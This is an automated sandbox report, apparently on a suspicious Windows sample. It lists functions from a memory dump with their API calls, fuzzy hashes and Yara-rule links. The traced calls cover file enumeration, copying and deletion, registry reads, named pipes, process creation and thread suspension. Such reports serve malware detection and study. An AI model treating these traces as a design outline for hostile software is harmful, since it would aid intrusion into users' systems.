GetLastError.KERNEL32 ref: 04631A48
RtlAllocateHeap.NTDLL(00000000,?), ref: 04631A64
GetLastError.KERNEL32 ref: 04631AB3
HeapFree.KERNEL32(00000000,00000000), ref: 04631AC9
RtlAllocateHeap.NTDLL(00000000,?), ref: 04631ADD
GetLastError.KERNEL32 ref: 04631AF7
GetLastError.KERNEL32 ref: 04631B2A
HeapFree.KERNEL32(00000000,00000000), ref: 04631B48
lstrlenW.KERNEL32(00000000,00750025), ref: 04631B74
RtlAllocateHeap.NTDLL(00000000,?), ref: 04631B89
DeleteFileW.KERNEL32(?,00000000,00610063,?,00000000,00000000,00000001), ref: 04631C5D
HeapFree.KERNEL32(00000000,?), ref: 04631C6C
WaitForSingleObject.KERNEL32(00000000), ref: 04631C81
HeapFree.KERNEL32(00000000,00000000), ref: 04631C94
HeapFree.KERNEL32(00000000,?), ref: 04631CA6
RtlExitUserThread.NTDLL(?,00750025), ref: 04631CBB

Strings

, xrefs: 04631B6D

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
String ID:
API String ID: 3853681310-3916222277
Opcode ID: 2f40fea0a61decf9bb79d429221dc41b3e98388406ae58f8c06a1c1f244b0b71
Instruction ID: bc4d2ddf0b96198106ec56259b4bcf4ebfee58eb617cc37fc296f06c4c10885e
Opcode Fuzzy Hash: 2f40fea0a61decf9bb79d429221dc41b3e98388406ae58f8c06a1c1f244b0b71
Instruction Fuzzy Hash: C2814B7990024AAFDF10DFA4CC85EAE7BB8EB8A705F044469E50293250FB38AD55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 046346E1, Relevance: 28.8, APIs: 19, Instructions: 281memorystringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 046346FC

Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?,73BCFC30,745EC740,?,00000250,?,00000000), ref: 0462F91A
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?,?,00000000), ref: 0462F926
Part of subcall function 0462F8CE: memset.NTDLL ref: 0462F96E
Part of subcall function 0462F8CE: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0462F989
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(0000002C), ref: 0462F9C1
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?), ref: 0462F9C9
Part of subcall function 0462F8CE: memset.NTDLL ref: 0462F9EC
Part of subcall function 0462F8CE: wcscpy.NTDLL ref: 0462F9FE

Part of subcall function 0462F8CE: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0462FA24
Part of subcall function 0462F8CE: RtlEnterCriticalSection.NTDLL(?), ref: 0462FA5A
Part of subcall function 0462F8CE: RtlLeaveCriticalSection.NTDLL(?), ref: 0462FA76
Part of subcall function 0462F8CE: FindNextFileW.KERNEL32(?,00000000), ref: 0462FA8F
Part of subcall function 0462F8CE: WaitForSingleObject.KERNEL32(00000000), ref: 0462FAA1
Part of subcall function 0462F8CE: FindClose.KERNEL32(?), ref: 0462FAB6
Part of subcall function 0462F8CE: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0462FACA
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(0000002C), ref: 0462FAEC

RtlAllocateHeap.NTDLL(00000000,00000036,00410025), ref: 04634757
memcpy.NTDLL(00000000,?,?), ref: 04634770
lstrcpyW.KERNEL32(?,004D005C), ref: 0463478A

Part of subcall function 0462F8CE: FindNextFileW.KERNEL32(?,00000000), ref: 0462FB62
Part of subcall function 0462F8CE: WaitForSingleObject.KERNEL32(00000000), ref: 0462FB74
Part of subcall function 0462F8CE: FindClose.KERNEL32(?), ref: 0462FB8F

HeapFree.KERNEL32(00000000,00000000,00000000,002E002A,?,00000000,00000000,00000010), ref: 046347B5
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 046347C7
HeapFree.KERNEL32(00000000,00000000), ref: 04634825
lstrlenW.KERNEL32(00000000,00750025), ref: 0463484A
RtlAllocateHeap.NTDLL(00000000,?), ref: 04634858
HeapFree.KERNEL32(00000000,?,?,006F0063,?,00000000,00000000,00000014), ref: 046348D8
HeapFree.KERNEL32(00000000,?), ref: 046348E8

Part of subcall function 0463DEFE: lstrlen.KERNEL32(00000000,?,00000020,?,00000000,04639946,00000000,7711DBB0,00000020,00000000), ref: 0463DF0D
Part of subcall function 0463DEFE: mbstowcs.NTDLL ref: 0463DF29

CreateDirectoryW.KERNEL32(00000000,00000000,00750025), ref: 04634911
lstrlenW.KERNEL32(046498C4,00750025), ref: 0463495F
lstrlenW.KERNEL32(04649898,00750025), ref: 04634983
DeleteFileW.KERNEL32(?,00750025), ref: 04634A06
HeapFree.KERNEL32(00000000,?), ref: 04634A14
HeapFree.KERNEL32(00000000,?), ref: 04634A35

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$Heap$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
String ID:
API String ID: 1826233894-0
Opcode ID: c6307fb2b1c3ecbed44ebd07c29348bd16df9fa975a7ff59ec01c185b2557f2c
Instruction ID: 2f91ba3294b6d385eb8573ff9f03851e04dffef02ca50883a622aa88adbdca65
Opcode Fuzzy Hash: c6307fb2b1c3ecbed44ebd07c29348bd16df9fa975a7ff59ec01c185b2557f2c
Instruction Fuzzy Hash: 5FB1597990111AAFCF14DFA4DC88DAABBB8FB9A354B008416F109D7250F734AA59CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04622F4E, Relevance: 27.3, APIs: 18, Instructions: 274memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04626213: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 0462624B
Part of subcall function 04626213: RtlAllocateHeap.NTDLL(00000000,?), ref: 0462625F
Part of subcall function 04626213: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 04626279
Part of subcall function 04626213: RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 046262A3

HeapFree.KERNEL32(00000000,?,05D3BB53,?,?), ref: 04622F95
RtlAllocateHeap.NTDLL(00000000,00010000,05D3BB53), ref: 04622FB3
HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 04622FDF
HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,?,00000000,?,?,?), ref: 0462304D
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 046230C5
wsprintfA.USER32 ref: 046230E1
lstrlen.KERNEL32(00000000,00000000), ref: 046230EC
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04623103
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0462318F
wsprintfA.USER32 ref: 046231AA
lstrlen.KERNEL32(00000000,00000000), ref: 046231B5
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 046231CC
HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,?,00000000,?,?,?), ref: 046231EE
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04623209
wsprintfA.USER32 ref: 04623220
lstrlen.KERNEL32(00000000,00000000), ref: 0462322B

Part of subcall function 046325D1: lstrlen.KERNEL32(0463AAC8,00000000,?,?,?,?,0463AAC8,00000035,00000000,?,00000000), ref: 04632601
Part of subcall function 046325D1: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04632617
Part of subcall function 046325D1: memcpy.NTDLL(00000010,0463AAC8,00000000,?,?,0463AAC8,00000035,00000000), ref: 0463264D
Part of subcall function 046325D1: memcpy.NTDLL(00000010,00000000,00000035,?,?,0463AAC8,00000035), ref: 04632668
Part of subcall function 046325D1: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04632686
Part of subcall function 046325D1: GetLastError.KERNEL32(?,?,0463AAC8,00000035), ref: 04632690
Part of subcall function 046325D1: HeapFree.KERNEL32(00000000,00000000,?,?,0463AAC8,00000035), ref: 046326B3

HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04623242
HeapFree.KERNEL32(00000000,?,0000001D,00000008,54504D45,05D38A20), ref: 0462326E

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
String ID:
API String ID: 3130754786-0
Opcode ID: 0b97249f254e3e7305cbdcb6f8aa1faee8ed564e07f7342cdf63be97197aadfd
Instruction ID: 92e33d61acfabc1d8d8de7f86a6133bd035f0ccf05d4ba62dd576837e36582b4
Opcode Fuzzy Hash: 0b97249f254e3e7305cbdcb6f8aa1faee8ed564e07f7342cdf63be97197aadfd
Instruction Fuzzy Hash: 4DA16DB9900519FFEF109FA4CD88EAE7BB9FB94745B004069E901A7250F7386D91CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0463B3AB, Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,74666F53,?), ref: 0463B3CD
RtlEnterCriticalSection.NTDLL(00000000), ref: 0463B3EA
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0463B43A
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0463B444
GetLastError.KERNEL32 ref: 0463B44E
HeapFree.KERNEL32(00000000,00000000), ref: 0463B45F
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0463B481
HeapFree.KERNEL32(00000000,?), ref: 0463B4B8
RtlLeaveCriticalSection.NTDLL(00000000), ref: 0463B4CC
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0463B4D5
SuspendThread.KERNEL32(00000364), ref: 0463B4E4
CreateEventA.KERNEL32(04648168,00000001,00000000), ref: 0463B4F8
SetEvent.KERNEL32(00000000), ref: 0463B505
CloseHandle.KERNEL32(00000000), ref: 0463B50C
Sleep.KERNEL32(000001F4), ref: 0463B51F
ResumeThread.KERNEL32(00000364), ref: 0463B543

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID:
API String ID: 1011176505-0
Opcode ID: 05ab36dd1e607e73486d3b7bb4fee279166a1e57c8f03c06e66f02e9d877a58f
Instruction ID: 35e2f53913b2dcd23b980a32c7fca31ab844a1d5caded154321f5b096acdb189
Opcode Fuzzy Hash: 05ab36dd1e607e73486d3b7bb4fee279166a1e57c8f03c06e66f02e9d877a58f
Instruction Fuzzy Hash: 8A41917A900249FFCF10AFA0DC89AAD7B79FB94B06B005069E60193212F7356DA0CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0462C3B9, Relevance: 24.1, APIs: 16, Instructions: 94stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,?,73B769A0,?,04634A02,?,?,?,00000000,00750025), ref: 0462C3D0
lstrlenW.KERNEL32(?,?,?,00000000,?,73B769A0,?,04634A02,?,?,?,00000000,00750025), ref: 0462C3E0
lstrlenW.KERNEL32(04634A02,?,?,00000000,?,73B769A0,?,04634A02,?,?,?,00000000,00750025), ref: 0462C3EE
lstrlenW.KERNEL32(?,?,?,00000000,?,73B769A0,?,04634A02,?,?,?,00000000,00750025), ref: 0462C3F6
RtlAllocateHeap.NTDLL(00000000,?), ref: 0462C40E
lstrcpyW.KERNEL32(00000000,?), ref: 0462C423
lstrcatW.KERNEL32(00000000,?), ref: 0462C43A
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,73B769A0,?,04634A02,?,?,?,00000000,00750025), ref: 0462C43E
lstrcatW.KERNEL32(00000000,046443E0), ref: 0462C44A
lstrcatW.KERNEL32(00000000), ref: 0462C453
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,73B769A0,?,04634A02,?,?,?,00000000), ref: 0462C458
lstrcatW.KERNEL32(00000000,046443E0), ref: 0462C464
lstrcatW.KERNEL32(00000000,00000002), ref: 0462C480
lstrcatW.KERNEL32(00000000,04634A02), ref: 0462C48D
CopyFileW.KERNEL32(04634A02,00000000,00000000,?,?,0000005C,?,?,00000000,?,73B769A0,?,04634A02,?,?,?), ref: 0462C495
HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,73B769A0,?,04634A02,?,?,?,00000000), ref: 0462C4A3

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID:
API String ID: 3635185113-0
Opcode ID: 85b05491ab0f86d477f11b2d429d537203517f3abe82bad55f8487e1e011639e
Instruction ID: f9290764e52e474c077ebebee15f62c72e8cc7f5eb6bf33e29e69a003c3a2443
Opcode Fuzzy Hash: 85b05491ab0f86d477f11b2d429d537203517f3abe82bad55f8487e1e011639e
Instruction Fuzzy Hash: E5219A36104324AFCB216B61DC8AE3FBBA8EFD9B95B00091DF54592111EB399C11DA66

Uniqueness

Uniqueness Score: -1.00%

Function 04625784, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

memset.NTDLL ref: 046257B2
StrChrA.SHLWAPI(?,0000000D), ref: 046257F8
StrChrA.SHLWAPI(?,0000000A), ref: 04625805
StrChrA.SHLWAPI(?,0000007C), ref: 0462582C
StrTrimA.SHLWAPI(?,04644510), ref: 04625841
StrChrA.SHLWAPI(?,0000003D), ref: 0462584A
StrTrimA.SHLWAPI(00000001,04644510), ref: 04625860
_strupr.NTDLL ref: 04625867
StrTrimA.SHLWAPI(?,?), ref: 04625874
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 046258BC
lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 046258DB

Strings

, xrefs: 0462586C
;, xrefs: 0462581A

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: $;
API String ID: 4019332941-73438061
Opcode ID: 6e1d90c681f6dc58282398f64ede93c3fd2202eac915b14ad4fdbfdeb0a3f62b
Instruction ID: 3398ecf060b6885eda1b204bb2148bc6d78d80dce1b2fedaf38c20d256ca9119
Opcode Fuzzy Hash: 6e1d90c681f6dc58282398f64ede93c3fd2202eac915b14ad4fdbfdeb0a3f62b
Instruction Fuzzy Hash: B541F371904366BFDB219F28D944B1ABBE8EB95710F04081EF49687341FB74F9058F66

Uniqueness

Uniqueness Score: -1.00%

Function 0463990C, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04639921

Part of subcall function 0463DEFE: lstrlen.KERNEL32(00000000,?,00000020,?,00000000,04639946,00000000,7711DBB0,00000020,00000000), ref: 0463DF0D
Part of subcall function 0463DEFE: mbstowcs.NTDLL ref: 0463DF29

lstrlenW.KERNEL32(00000000,00000000,00000000,7711DBB0,00000020,00000000), ref: 0463995C
wcstombs.NTDLL ref: 04639966
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7711DBB0,00000020,00000000), ref: 0463999A
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04621060), ref: 046399C6
TerminateProcess.KERNEL32(?,000003E5), ref: 046399DC
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04621060), ref: 046399F0
GetLastError.KERNEL32 ref: 046399F4
GetExitCodeProcess.KERNEL32(?,00000001), ref: 04639A14
CloseHandle.KERNEL32(?), ref: 04639A23
CloseHandle.KERNEL32(?), ref: 04639A28
GetLastError.KERNEL32 ref: 04639A2C

Strings

D, xrefs: 04639937

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: D
API String ID: 2463014471-2746444292
Opcode ID: 4405dd92e32061b9d9392483ef4902a76fd52514c9551d2fe03bc7372384f1d2
Instruction ID: df690a428246fbfc544d95b291e4bd5985a21bd5ebb556e52114f1d1e03bb616
Opcode Fuzzy Hash: 4405dd92e32061b9d9392483ef4902a76fd52514c9551d2fe03bc7372384f1d2
Instruction Fuzzy Hash: 16412DB6D00158BFDF119FA4CC85AEEBBBCEB48345F10406AE515B6240FA756E54CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04623FED, Relevance: 21.2, APIs: 14, Instructions: 201memorystringthreadCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 0462403C
StrTrimA.SHLWAPI(00000001,20000920), ref: 04624055
StrChrA.SHLWAPI(?,0000002C), ref: 04624060
StrTrimA.SHLWAPI(00000001,20000920), ref: 04624079
lstrlen.KERNEL32(?,00000001,?,?), ref: 04624111
RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 04624133
lstrcpy.KERNEL32(00000020,?), ref: 04624152
lstrlen.KERNEL32(?), ref: 0462415C
memcpy.NTDLL(?,?,?), ref: 0462419D
memcpy.NTDLL(?,?,?), ref: 046241B0
SwitchToThread.KERNEL32(?,00000000,?,?), ref: 046241D4
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 046241F3
HeapFree.KERNEL32(00000000,?,00000001,?,?), ref: 04624219
HeapFree.KERNEL32(00000000,00000001,00000001,?,?), ref: 04624235

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 3323474148-0
Opcode ID: 2b6c57681a68b83b355047dd901d7685d919e7e9090586ec8b0f5171fe31a92e
Instruction ID: 3fb3f27f17954edb1a8b4bbc865dc6cfc77f433a7961cb17098fb47d21707707
Opcode Fuzzy Hash: 2b6c57681a68b83b355047dd901d7685d919e7e9090586ec8b0f5171fe31a92e
Instruction Fuzzy Hash: 6F719A36104711AFDB20DF24C844A5BBBE8FB98704F04492EF59993251EB74E985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0464162C, Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000), ref: 04641643
lstrlen.KERNEL32(?,?,00000000), ref: 0464164A
RtlAllocateHeap.NTDLL(00000000,?), ref: 04641661
lstrcpy.KERNEL32(00000000,?), ref: 04641672
lstrcat.KERNEL32(?,?), ref: 0464168E
lstrcat.KERNEL32(?,7866702E), ref: 0464169F
RtlAllocateHeap.NTDLL(00000000,?), ref: 046416B0
RtlAllocateHeap.NTDLL(00000000,?), ref: 0464174D
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 04641786
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0464179F
CloseHandle.KERNEL32(00000000,?,00000000), ref: 046417A9
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 046417B9
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 046417D2
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 046417E2

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID:
API String ID: 333890978-0
Opcode ID: 759a1de282f0f84ed2136e40f3623c636a7469afe08e1cf4be42e419120715be
Instruction ID: e09836be0d2dd7ff057c6f8af46612bd43a445c5905967a35f8656aa7a8ee804
Opcode Fuzzy Hash: 759a1de282f0f84ed2136e40f3623c636a7469afe08e1cf4be42e419120715be
Instruction Fuzzy Hash: FA519D7A400109BFCF01AFA4DC88DAE7BBDEF8A344B059466F60197210E7359E958F60

Uniqueness

Uniqueness Score: -1.00%

Function 04631EDD, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 128timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 04631F1F
OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 04631F32
CloseHandle.KERNEL32(00000000), ref: 0463204A

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

memset.NTDLL ref: 04631F55
memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 04631FD4
RtlEnterCriticalSection.NTDLL(?), ref: 04631FE9
RtlLeaveCriticalSection.NTDLL(?), ref: 04632001
GetLastError.KERNEL32(04627A06,?,?,?,?,?,?,?,00000040), ref: 04632019
RtlEnterCriticalSection.NTDLL(?), ref: 04632025
RtlLeaveCriticalSection.NTDLL(?), ref: 04632034

Strings

0x%08X, xrefs: 04631EF1
W, xrefs: 04632050

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
String ID: 0x%08X$W
API String ID: 1559661116-2600449260
Opcode ID: 89725b563bb87d129fad463ddc9aeb9350193bcd558ee960d942496e068e66c8
Instruction ID: 4354f3cecbd514fbd9fc4fa8db069cb5b721326a7be97b9f8682d815ad431071
Opcode Fuzzy Hash: 89725b563bb87d129fad463ddc9aeb9350193bcd558ee960d942496e068e66c8
Instruction Fuzzy Hash: 4F418FB5900209FFDB20DFA4C885A9EBBF8FF08345F108569E549D7290E774AA54CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04638F93, Relevance: 21.1, APIs: 14, Instructions: 126memorysynchronizationCOMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04622951), ref: 04638FBC
RtlDeleteCriticalSection.NTDLL(04648360), ref: 04638FEF
RtlDeleteCriticalSection.NTDLL(04648380), ref: 04638FF6
ReleaseMutex.KERNEL32(000002BC,00000000,?,?,?,04622951), ref: 0463901F
CloseHandle.KERNEL32(?,?,04622951), ref: 0463902B
ResetEvent.KERNEL32(00000000,00000000,?,?,?,04622951), ref: 04639037
CloseHandle.KERNEL32(?,?,04622951), ref: 04639043
SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04622951), ref: 04639049
SleepEx.KERNEL32(00000064,00000001,?,?,04622951), ref: 0463905D
HeapFree.KERNEL32(00000000,00000000,?,?,04622951), ref: 04639081
RtlRemoveVectoredExceptionHandler.NTDLL(046505B8), ref: 046390B7
SleepEx.KERNEL32(00000064,00000001,?,?,04622951), ref: 046390D3
CloseHandle.KERNEL32(05D3F060,?,?,04622951), ref: 046390FC
LocalFree.KERNEL32(?,?,04622951), ref: 0463910C

Part of subcall function 046361F2: GetVersion.KERNEL32(?,?,73BCF720,?,04638FAB,00000000,?,?,?,04622951), ref: 04636216
Part of subcall function 046361F2: GetModuleHandleA.KERNEL32(4C44544E,05D39849,?,73BCF720,?,04638FAB,00000000,?,?,?,04622951), ref: 04636233
Part of subcall function 046361F2: GetProcAddress.KERNEL32(00000000), ref: 0463623A

Part of subcall function 046356DA: RtlEnterCriticalSection.NTDLL(04648380), ref: 046356E4
Part of subcall function 046356DA: RtlLeaveCriticalSection.NTDLL(04648380), ref: 04635720

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalHandleSectionSleep$Close$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 1765366784-0
Opcode ID: a575e94963a1516f87e930cf16040b831eb76a87e57fed77d7770c913e98f997
Instruction ID: 2e82090d7fb9d32db4d3f285492c8bce7ba69a2c836142d4b57847431c432629
Opcode Fuzzy Hash: a575e94963a1516f87e930cf16040b831eb76a87e57fed77d7770c913e98f997
Instruction Fuzzy Hash: 9441807D7106519BEF20BFA5E844B5537AAEBA0B46B046029F600D7240FBB9EC44CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04629504, Relevance: 21.1, APIs: 14, Instructions: 119memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32 ref: 04629521
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0462952E
lstrcpy.KERNEL32(00000000,?), ref: 04629543
StrRChrA.SHLWAPI(00000000,00000000,0000005C), ref: 0462954D
GetFileAttributesA.KERNEL32(?), ref: 0462956C
HeapFree.KERNEL32(00000000,00000000), ref: 04629642
HeapFree.KERNEL32(00000000,00000000), ref: 04629651
HeapFree.KERNEL32(00000000,00000000), ref: 04629660

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$AllocateAttributesFilelstrcpylstrlen
String ID:
API String ID: 530445200-0
Opcode ID: f045a935068b0da057f47154b0ef0045238880e9c877243c17f12eeb80c1447f
Instruction ID: c3453dc122d4997d67c8ff437aadf9aaf14cb6430ada58538e347724df7506a7
Opcode Fuzzy Hash: f045a935068b0da057f47154b0ef0045238880e9c877243c17f12eeb80c1447f
Instruction Fuzzy Hash: CB418075204712ABEB11AF24DD45F6B3BECEFD5B49F400019F540A2251FB28EE198F6A

Uniqueness

Uniqueness Score: -1.00%

Function 04638AF9, Relevance: 21.1, APIs: 14, Instructions: 109libraryloaderstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,0463A019,?,00550025), ref: 04638B06

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0463A019,?,00550025), ref: 04638B2F
lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04638B4F
lstrcpyW.KERNEL32(-00000002,0073006E), ref: 04638B6B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0463A019,?,00550025), ref: 04638B77
LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0463A019,?,00550025), ref: 04638B7A
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0463A019,?,00550025), ref: 04638B86
GetProcAddress.KERNEL32(00000000,5F53534E), ref: 04638BA3
GetProcAddress.KERNEL32(00000000,5F53534E), ref: 04638BBD
GetProcAddress.KERNEL32(00000000,31314B50), ref: 04638BD3
GetProcAddress.KERNEL32(00000000,31314B50), ref: 04638BE9
GetProcAddress.KERNEL32(00000000,31314B50), ref: 04638BFF
GetProcAddress.KERNEL32(00000000,31314B50), ref: 04638C15
FreeLibrary.KERNEL32(00000000,?,?,?,?,0463A019,?,00550025), ref: 04638C3E

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
String ID:
API String ID: 3772355505-0
Opcode ID: 1ae87686391216ffd52d63ff96d29ad0ec94fc56a1cf1c871a699e91fc6864b5
Instruction ID: e801410e7df820e589320e9d8dadcdf38aea9de019535cf6786f2e8c14810da8
Opcode Fuzzy Hash: 1ae87686391216ffd52d63ff96d29ad0ec94fc56a1cf1c871a699e91fc6864b5
Instruction Fuzzy Hash: 6B3187B550170BAFDB10AF64DC85DA67BECEF9A345B00942AB504C3241FB78EC198BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0463355F, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 110librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(494E4957), ref: 0463357F
TlsAlloc.KERNEL32 ref: 04633589
LoadLibraryA.KERNEL32(72666569), ref: 046335B2
LoadLibraryA.KERNEL32(69756569), ref: 046335C0
LoadLibraryA.KERNEL32(7468736D), ref: 046335CE
LoadLibraryA.KERNEL32(74656E69), ref: 046335DC
LoadLibraryA.KERNEL32(70616569), ref: 046335EA
LoadLibraryA.KERNEL32(6D6C7275), ref: 046335F8
___HrLoadAllImportsForDll@4.DELAYIMP ref: 04633622
HeapFree.KERNEL32(00000000,?,?,?,0000000C,00000000), ref: 046336A3

Strings

~, xrefs: 046336B4

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Load$Library$AllocDll@4FreeHeapImports
String ID: ~
API String ID: 1792504554-1707062198
Opcode ID: a2196ca761133c826c400317c9e77e25d738005641e00df9a2b71753349573f9
Instruction ID: 46e947d88ecf42b657a5bd1d5e937f22b778e9d76548a2de3205587adce3e311
Opcode Fuzzy Hash: a2196ca761133c826c400317c9e77e25d738005641e00df9a2b71753349573f9
